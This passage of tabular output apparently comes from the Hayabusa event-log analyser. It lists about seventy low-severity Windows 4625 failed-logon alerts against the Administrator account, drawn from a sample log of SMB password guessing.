| 1426 | 2016-09-20 01:50:41.010 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Np8mTqhr7QasXk1e : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1427 | 2016-09-20 01:50:41.065 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MhpDNDIPVyRlfej8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1428 | 2016-09-20 01:50:41.118 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: qZtmxGeLj25VSUcm : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1429 | 2016-09-20 01:50:41.166 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: SPN8w8WghBYzChZc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1430 | 2016-09-20 01:50:41.205 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 36hmbCuKxF9Dt4vR : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1431 | 2016-09-20 01:50:41.248 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: TALpRirdvB9a8y6M : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1432 | 2016-09-20 01:50:41.292 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wvEvwFeXGOgycZvA : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1433 | 2016-09-20 01:50:41.328 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5ppxeOgZNua2Ieuc : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1434 | 2016-09-20 01:50:41.387 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: n4U5XdQu1YtSat7J : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1435 | 2016-09-20 01:50:41.438 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MN0OfYE6vPgqyyZN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1436 | 2016-09-20 01:50:41.494 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MmfCPIdiTH9gG2qZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1437 | 2016-09-20 01:50:41.540 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UtcHAxmfDL9C9uZa : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1438 | 2016-09-20 01:50:41.584 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5TX62kMSJqq0Lv8o : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1439 | 2016-09-20 01:50:41.624 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hA20OdabfW5DMphV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1440 | 2016-09-20 01:50:41.665 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Ex5Awm2zaVhvAMTH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1441 | 2016-09-20 01:50:41.724 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: I72BOMPQHyyP374g : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1442 | 2016-09-20 01:50:41.790 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4al5pUa4mKfbL734 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1443 | 2016-09-20 01:50:41.830 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: UNHH8ESWZ4Rx6K93 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1444 | 2016-09-20 01:50:41.873 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5ay3XdxRFXXaD4Ib : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1445 | 2016-09-20 01:50:41.920 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 1PgyG7spUL5glkVh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1446 | 2016-09-20 01:50:41.956 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 6D6PVnrIODwtcIXN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1447 | 2016-09-20 01:50:41.999 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: cRZgqmQbL3l7KTke : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1448 | 2016-09-20 01:50:42.032 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HYGKv2l0s9XZnqkl : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1449 | 2016-09-20 01:50:42.078 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: wX2R08dxiEcRNzcM : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1450 | 2016-09-20 01:50:42.120 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HcN791fdSHwaWuBC : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1451 | 2016-09-20 01:50:42.153 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: CRObbkQsykQma2Tn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1452 | 2016-09-20 01:50:42.194 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: v4UvU7VglbA2p0Z9 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1453 | 2016-09-20 01:50:42.224 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8ODkwHD0dwGaWhVH : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1454 | 2016-09-20 01:50:42.272 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5bPQ5GsX1UUXA6ws : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1455 | 2016-09-20 01:50:42.320 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: bvRQ0dVaLawXoo2O : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1456 | 2016-09-20 01:50:42.359 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BjxwDdOYBDDSJGun : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1457 | 2016-09-20 01:50:42.396 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: czlTDa1F6edSUBdy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1458 | 2016-09-20 01:50:42.436 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: Mrtgv5HAqRuelEvF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1459 | 2016-09-20 01:50:42.484 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gfny9Y4SGRZTUXi7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1460 | 2016-09-20 01:50:42.527 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hdhoRgnyj4JPpN2j : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1461 | 2016-09-20 01:50:42.568 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: K4Qclkpq5ZMKmdCB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1462 | 2016-09-20 01:50:42.612 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 0GdZSrcqmfGBfAVy : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1463 | 2016-09-20 01:50:42.655 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: XA7eJrFopzOb3YQS : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1464 | 2016-09-20 01:50:42.689 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 2XoSwawv7Ji26GQT : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1465 | 2016-09-20 01:50:42.729 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 637CaCAc9u7z99X7 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1466 | 2016-09-20 01:50:42.777 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5Y6Pww45qxQjrZ0C : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1467 | 2016-09-20 01:50:42.822 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5CPU20SF5i6Cdq34 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1468 | 2016-09-20 01:50:42.860 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HAdaPDVTws6TObvK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1469 | 2016-09-20 01:50:42.901 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: KUCoisntgbX7Mnis : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1470 | 2016-09-20 01:50:42.952 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MFN0b769jRyDxyAW : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1471 | 2016-09-20 01:50:42.993 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: HKr2OCyezvSEsHBZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1472 | 2016-09-20 01:50:43.034 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: QN3snXM4mwhauvvF : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1473 | 2016-09-20 01:50:43.163 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: J1VpvQgnwXVxRY1u : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1474 | 2016-09-20 01:50:43.233 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: p5bsnUZjpHrbD6kN : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1475 | 2016-09-20 01:50:43.286 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: hpL2QnQ0kKqU40a6 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1476 | 2016-09-20 01:50:43.369 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: rpkpNfeTsOeXEsJ0 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1477 | 2016-09-20 01:50:43.400 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 5mBhuTFm02IjipEw : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1478 | 2016-09-20 01:50:43.443 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: yZ908ZOCkSBC7tms : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1479 | 2016-09-20 01:50:43.487 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8l7Bct5nMTZHd5mK : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1480 | 2016-09-20 01:50:43.522 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: lRk6e7SrInMDsdMV : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1481 | 2016-09-20 01:50:43.560 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: MhGByctTcM7NXGtB : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1482 | 2016-09-20 01:50:43.604 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: BgzhW3Pd5JAB8j4f : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1483 | 2016-09-20 01:50:43.643 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: GZOm1J5kdItrQpGL : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1484 | 2016-09-20 01:50:43.680 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: DK77Hylw8CJHVGvb : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1485 | 2016-09-20 01:50:43.720 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: pf7DQVQY7AowT8NY : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1486 | 2016-09-20 01:50:43.762 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 4us3HR9jseQWIHt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1487 | 2016-09-20 01:50:43.805 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vhJRmgooz8CXjB6E : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1488 | 2016-09-20 01:50:43.848 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: LkjIXxAvEDrPFUpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1489 | 2016-09-20 01:50:43.889 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: ENc8aqouBangyUrU : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1490 | 2016-09-20 01:50:43.932 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 7flMdluc8YRhOuzn : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1491 | 2016-09-20 01:50:43.971 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: 8WFqeMJIXGDjDP0a : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1492 | 2016-09-20 01:50:44.015 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: iKeRDzfuDCJSv4Wh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1493 | 2016-09-20 01:50:44.058 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: gNEYkgBoG8rAE6SP : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1494 | 2016-09-20 01:50:44.090 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: vyy1aBvh6lJBs5M5 : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
| 1495 | 2016-09-20 01:50:44.146 +09:00 | DESKTOP-M5SN04R | 4625 | low | Logon Failure - Wrong Password | User: Administrator : Type: 3 : Workstation: oyhiWNroUS5X5AEh : IP Address: 192.168.198.149 : AuthPackage: NTLM | rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml | ../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx |
